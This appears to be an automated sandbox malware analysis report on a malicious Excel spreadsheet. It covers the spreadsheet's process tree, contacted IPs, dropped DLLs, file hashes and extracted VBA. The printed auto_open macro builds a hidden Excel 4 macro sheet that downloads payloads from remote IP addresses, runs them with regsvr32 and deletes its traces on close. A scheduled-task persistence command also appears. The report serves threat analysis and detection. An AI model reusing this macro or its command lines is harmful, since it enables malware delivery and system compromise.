                        Replication Through Removable MediaExploitation for Client Execution32Rc.commonRc.commonScripting2Cached Domain CredentialsSystem Information Discovery15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 492195 Sample: Compensation-1214892625-092... Startdate: 28/09/2021 Architecture: WINDOWS Score: 100 54 Multi AV Scanner detection for submitted file 2->54 56 Document exploit detected (drops PE files) 2->56 58 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->58 60 9 other signatures 2->60 9 EXCEL.EXE 194 32 2->9         started        14 regsvr32.exe 2->14         started        16 regsvr32.exe 2->16         started        process3 dnsIp4 48 190.14.37.178, 49165, 80 OffshoreRacksSAPA Panama 9->48 50 185.183.96.67, 80 HSAE Netherlands 9->50 52 185.250.148.213, 80 FIRSTDC-ASRU Russian Federation 9->52 46 C:\Users\user\...\44467.5523376157[1].dat, PE32 9->46 dropped 76 Document exploit detected (UrlDownloadToFile) 9->76 18 regsvr32.exe 9->18         started        20 regsvr32.exe 9->20         started        22 regsvr32.exe 9->22         started        24 regsvr32.exe 14->24         started        27 regsvr32.exe 16->27         started        file5 signatures6 process7 signatures8 29 regsvr32.exe 18->29         started        68 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 24->68 70 Injects code into the Windows Explorer (explorer.exe) 24->70 72 Writes to foreign memory regions 24->72 74 2 other signatures 24->74 32 explorer.exe 8 1 24->32         started        process9 file10 78 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 29->78 80 Injects code into the Windows Explorer (explorer.exe) 29->80 82 Writes to foreign memory regions 29->82 86 2 other signatures 29->86 35 explorer.exe 8 1 29->35         started        44 C:\Users\user\Drezd.red, PE32 32->44 dropped 84 Uses cmd line tools excessively to alter registry or file data 32->84 38 reg.exe 1 32->38         started        40 reg.exe 1 32->40         started        signatures11 process12 signatures13 62 Uses cmd line tools excessively to alter registry or file data 35->62 64 Drops PE files to the user root directory 35->64 66 Uses schtasks.exe or at.exe to add and modify task schedules 35->66 42 schtasks.exe 35->42         started        process14

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        Compensation-1214892625-09272021.xls9%MetadefenderBrowse
                        Compensation-1214892625-09272021.xls11%ReversingLabsScript.Trojan.Heuristic

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.5523376157[1].dat100%Joe Sandbox ML
                        C:\Users\user\Drezd.red9%ReversingLabs

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://www.%s.comPA0%URL Reputationsafe
                        http://190.14.37.178/44467.5523376157.dat0%Avira URL Cloudsafe
                        http://servername/isapibackend.dll0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://190.14.37.178/44467.5523376157.datfalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.%s.comPAregsvr32.exe, 00000006.00000002.609965037.00000000021D0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.875570398.00000000022B0000.00000002.00020000.sdmpfalse
                        • URL Reputation: safe
                        		low
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000007.00000002.875570398.00000000022B0000.00000002.00020000.sdmpfalse
                          		high
                          http://servername/isapibackend.dllregsvr32.exe, 00000005.00000002.611948922.0000000001D20000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.609589480.0000000001ED0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.612616089.0000000001C40000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.613822412.0000000001CF0000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.624790333.0000000000980000.00000002.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		low

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          185.183.96.67
                          		unknownNetherlands
                          		60117HSAEfalse
                          190.14.37.178
                          		unknownPanama
                          		52469OffshoreRacksSAPAfalse
                          185.250.148.213
                          		unknownRussian Federation
                          		48430FIRSTDC-ASRUfalse

                          General Information

                          Joe Sandbox Version:33.0.0 White Diamond
                          Analysis ID:492195
                          Start date:28.09.2021
                          Start time:13:15:22
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 14m 39s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:Compensation-1214892625-09272021.xls
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of analysed new started processes analysed:22
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.expl.evad.winXLS@25/6@0/3
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:
                          • Successful, ratio: 23.3% (good quality ratio 21.8%)
                          • Quality average: 75.9%
                          • Quality standard deviation: 28.3%
                          HCA Information:
                          • Successful, ratio: 86%
                          • Number of executed functions: 136
                          • Number of non-executed functions: 81
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .xls
                          • Changed system and user locale, location and keyboard layout to English - United States
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Attach to Office via COM
                          • Scroll down
                          • Close Viewer
                          Warnings:
                          Show All
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/492195/sample/Compensation-1214892625-09272021.xls

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          13:16:51API Interceptor27x Sleep call for process: regsvr32.exe modified
                          13:16:53API Interceptor904x Sleep call for process: explorer.exe modified
                          13:16:55API Interceptor1x Sleep call for process: schtasks.exe modified
                          13:16:56Task SchedulerRun new task: bganttcv path: regsvr32.exe s>-s "C:\Users\user\Drezd.red"

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASN

                          No context

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.5523376157[1].dat
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):387072
                          Entropy (8bit):4.528526718288657
                          Encrypted:false
                          SSDEEP:3072:Do6vBnby4Yx0XjFFzPQ0MslzERfQB24hLxBVi/b/9+PdpiWC35ol/uwfTuT2b2Mm:vs6Xpq0H3Jhds/9+qC/zfTPLQ
                          MD5:72FBB8519D0E09871770F70BADB9E06D
                          SHA1:55D43A77EF1F2EB80B93F73224C8391C4C4AEAB4
                          SHA-256:1E12BBEEE2F67A232F46593FEDA28B7BED1F0793C31DDA211FD4687AD548A07C
                          SHA-512:011D6A51019EA32CC22F66D8FDD670CE838DF5B05911C48888A4DA8C434630FBB0E1D562F108DBA4498E7C6877FD16CF533A0BB0A6DB00A7B2826882DDC8457B
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):162688
                          Entropy (8bit):4.254383493408124
                          Encrypted:false
                          SSDEEP:1536:C6tL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CUJNSc83tKBAvQVCgOtmXmLpLm4l
                          MD5:0A0D1EA546EAE1EB37BE8504A1BDEDBF
                          SHA1:3C41F8F0A0F81FF4221E2F52B64AC29B4CF831D4
                          SHA-256:35F89C20AC1950E68ABD4259B6C5FE15A083F927FCDA7DC5772CD7153A4BED9C
                          SHA-512:6C120A1A2F0AE51454F5F24ACFE20261BE82181B0A287DC98A502AACFDBF99CBC9EFECFBF0BCC502192F35BACAB3EA13B97C68C880EBE36F23B3B4166AA92973
                          Malicious:false
                          Reputation:unknown
                          Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
                          C:\Users\user\AppData\Local\Temp\VBE\RefEdit.exd
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):15676
                          Entropy (8bit):4.532537064976408
                          Encrypted:false
                          SSDEEP:192:Cxl811DxzCOtHIT6P20eChgZjTdZ3HJV8L1I17EMBkDXrq9LwGGLVbkLde:C3wxesT20lheZ3waE5D7qxIxkxe
                          MD5:76C2C75F386C3360BDE27E064F98E9D0
                          SHA1:97FC7A67C9411195152E7D2DB62F4B96D817EEE0
                          SHA-256:A47AFE468EA44172F39F9A0A51729C40022FA74D948F56B8261BBC0D4D2470A9
                          SHA-512:56E81A6CB1A2AAA8064A0372D6E386F23475B45ED76887345FDC039161E7698C50A104FEF747B9BD5776343F4B0325A8C29B51EB77E32E5F6EBB3943F11C5483
                          Malicious:false
                          Reputation:unknown
                          Preview: MSFT................A...............................1............... ...................d...........,...................\...........H...4...........0... ...............................................................x...............................x.......................................................................................$"...............................................P..................................................$"..........................................0....P..,.........................0.....................%"..........................................H..."...................................................H.......(...................@...................P...............0.......`...............................p...X... .....................M.<.U.*k..........E.............F...........B........`..d......."E.............F........0..............F..........E........`.M...........CPf.........0..=.......01..)....w....<WI.......\.1Y........k...U........".......|...K..a...
                          C:\Users\user\Drezd.red
                          Process:C:\Windows\SysWOW64\explorer.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):387072
                          Entropy (8bit):1.6961804656486577
                          Encrypted:false
                          SSDEEP:1536:92VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:XC6MtAAFNJ5XC5SYCi02r+J
                          MD5:B19B0AF9A01DD936D091C291B19696C8
                          SHA1:862ED0B9586729F2633670CCD7D075D7693908E1
                          SHA-256:17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330
                          SHA-512:9F0CE65AFA00919797A3A75308CF49366D5DCA0C17EA3CFAB70A9E9244E0D5AB6DEC21A3A46C2C609159E0CBF91AF4F10E6A36F3FB7310A5C2B062249AB43DB4
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 9%
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................

                          Static File Info

                          General

                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Mon Sep 27 10:38:52 2021, Security: 0
                          Entropy (8bit):7.131912306364678
                          TrID:
                          • Microsoft Excel sheet (30009/1) 47.99%
                          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                          File name:Compensation-1214892625-09272021.xls
                          File size:129024
                          MD5:cbf2562df8735334741b3de3ef9a0362
                          SHA1:db3bff7a0edc4dd7e3f4915dc36888f3be97c814
                          SHA256:1b663952d7fa9e49cd53878bfddf2e2906788cbc7394b081e0fea52efd1fb6d1
                          SHA512:8f24c7078ae03464e7bd2979c38f10b708f6fcca7bfab2b60328b135770eed1eb84aa151abde8f20b0a7b8b868f22a74cac1c5f2cf48ac8b0a4a20f94d37f349
                          SSDEEP:3072:Cik3hOdsylKlgxopeiBNhZFGzE+cL2kdAnc6YehWfG+tUHKGDbpmsiilBti2JtqV:vk3hOdsylKlgxopeiBNhZF+E+W2kdAnE
                          File Content Preview:........................>.......................................................b..............................................................................................................................................................................

                          File Icon

                          Icon Hash:e4eea286a4b4bcb4

                          Static OLE Info

                          General

                          Document Type:OLE
                          Number of OLE Files:1

                          OLE File "Compensation-1214892625-09272021.xls"

                          Indicators

                          Has Summary Info:True
                          Application Name:Microsoft Excel
                          Encrypted Document:False
                          Contains Word Document Stream:False
                          Contains Workbook/Book Stream:True
                          Contains PowerPoint Document Stream:False
                          Contains Visio Document Stream:False
                          Contains ObjectPool Stream:
                          Flash Objects Count:
                          Contains VBA Macros:True

                          Summary

                          Code Page:1251
                          Author:Test
                          Last Saved By:Test
                          Create Time:2015-06-05 18:17:20
                          Last Saved Time:2021-09-27 09:38:52
                          Creating Application:Microsoft Excel
                          Security:0

                          Document Summary

                          Document Code Page:1251
                          Thumbnail Scaling Desired:False
                          Company:
                          Contains Dirty Links:False
                          Shared Document:False
                          Changed Hyperlinks:False
                          Application Version:1048576

                          Streams with VBA

                          VBA File Name: UserForm2, Stream Size: -1
                          General
                          Stream Path:_VBA_PROJECT_CUR/UserForm2
                          VBA File Name:UserForm2
                          Stream Size:-1
                          Data ASCII:
                          Data Raw:
                          VBA Code
                          Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{C7392748-7F28-4EE6-BCFC-6C9C72F3AD88}{96B851A6-6A1B-4177-A71C-36C172A843DA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                          VBA File Name: Module5, Stream Size: 4241
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Module5
                          VBA File Name:Module5
                          Stream Size:4241
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:01 16 03 00 03 f0 00 00 00 a2 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff d0 03 00 00 9c 0d 00 00 00 00 00 00 01 00 00 00 fb 18 e3 25 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          VBA Code
                          Attribute VB_Name = "Module5"

Sub auto_open()
On Error Resume Next
Trewasd = "REGISTER"
Drezden = "="
Naret = "EXEC"
Application.ScreenUpdating = False
Gert
Sheets("Sheet777").Visible = False
Sheets("Sheet777").Range("A1:M100").Font.Color = vbWhite

Sheets("Sheet777").Range("H24") = UserForm2.Label1.Caption
Sheets("Sheet777").Range("H25") = UserForm2.Label3.Caption
Sheets("Sheet777").Range("H26") = UserForm2.Label4.Caption

Sheets("Sheet777").Range("K17") = "=NOW()"
Sheets("Sheet777").Range("K18") = ".dat"
Sheets("Sheet777").Range("K18") = ".dat"


Sheets("Sheet777").Range("H35") = "=HALT()"
Sheets("Sheet777").Range("I9") = UserForm2.Label2.Caption
Sheets("Sheet777").Range("I10") = UserForm2.Caption
Sheets("Sheet777").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
Sheets("Sheet777").Range("I12") = "Byukilos"
Sheets("Sheet777").Range("G10") = "..\Drezd.red"
Sheets("Sheet777").Range("G11") = "..\Drezd1.red"
Sheets("Sheet777").Range("G12") = "..\Drezd2.red"
Sheets("Sheet777").Range("I17") = "regsvr32 -silent ..\Drezd.red"
Sheets("Sheet777").Range("I18") = "regsvr32 -silent ..\Drezd1.red"
Sheets("Sheet777").Range("I19") = "regsvr32 -silent ..\Drezd2.red"
Sheets("Sheet777").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheet777").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Sheet777").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
Sheets("Sheet777").Range("H9") = Drezden & Trewasd & "(I9,I10&J10,I11,I12,,1,9)"
Sheets("Sheet777").Range("H17") = Drezden & Naret & "(I17)"
Sheets("Sheet777").Range("H18") = Drezden & Naret & "(I18)"
Sheets("Sheet777").Range("H19") = Drezden & Naret & "(I19)"


Application.Run Sheets("Sheet777").Range("H1")

End Sub

Sub auto_close()
On Error Resume Next
Application.ScreenUpdating = True
   Application.DisplayAlerts = False
   Sheets("Sheet777").Delete
   Application.DisplayAlerts = True
End Sub

Function Gert()
Set Fera = Excel4IntlMacroSheets
Fera.Add.Name = "Sheet777"
End Function
                          VBA File Name: Sheet1, Stream Size: 991
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                          VBA File Name:Sheet1
                          Stream Size:991
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . 9 . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 fb 18 b4 39 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          VBA Code
                          Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
                          VBA File Name: ThisWorkbook, Stream Size: 2501
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                          VBA File Name:ThisWorkbook
                          Stream Size:2501
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r S . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:01 16 03 00 00 f0 00 00 00 82 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 89 04 00 00 a9 07 00 00 00 00 00 00 01 00 00 00 fb 18 72 53 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          VBA Code
                          Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

Private m_openAlreadyRan As Boolean
Private m_isOpenDelayed As Boolean

Friend Sub FireOpenEventIfNeeded(Optional dummyVarToMakeProcHidden As Boolean)
End Sub

Private Sub asWorkbook_Activateas()
    On Error Resume Next

    If m_isOpenDelayed Then
        m_isOpenDelayed = False
        InitWorkbook
    End If
End Sub

Private Sub saWorkbook_Opensa()
    On Error Resume Next


End Sub

Private Sub ssaaInitWorkbookssaa()
    On Error Resume Next

    If VBA.Val(Application.Version) < 12 Then
        Me.Close False
        Exit Sub
    End If
    '
        'Other code
        '
        '
        '
End Sub
                          VBA File Name: UserForm2, Stream Size: 1182
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/UserForm2
                          VBA File Name:UserForm2
                          Stream Size:1182
                          Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 fb 18 b2 4a 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          VBA Code
                          Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{C7392748-7F28-4EE6-BCFC-6C9C72F3AD88}{96B851A6-6A1B-4177-A71C-36C172A843DA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

                          Streams

                          Stream Path: \x1CompObj, File Type: data, Stream Size: 108
                          General
                          Stream Path:\x1CompObj
                          File Type:data
                          Stream Size:108
                          Entropy:4.18849998853
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                          General
                          Stream Path:\x5DocumentSummaryInformation
                          File Type:data
                          Stream Size:244
                          Entropy:2.65175227267
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
                          General
                          Stream Path:\x5SummaryInformation
                          File Type:data
                          Stream Size:208
                          Entropy:3.33231709703
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . . 6 { . . . . . . . . . . . .
                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 101831
                          General
                          Stream Path:Workbook
                          File Type:Applesoft BASIC program data, first line number 16
                          Stream Size:101831
                          Entropy:7.65479066874
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @
                          Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 54 65 73 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                          Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 662
                          General
                          Stream Path:_VBA_PROJECT_CUR/PROJECT
                          File Type:ASCII text, with CRLF line terminators
                          Stream Size:662
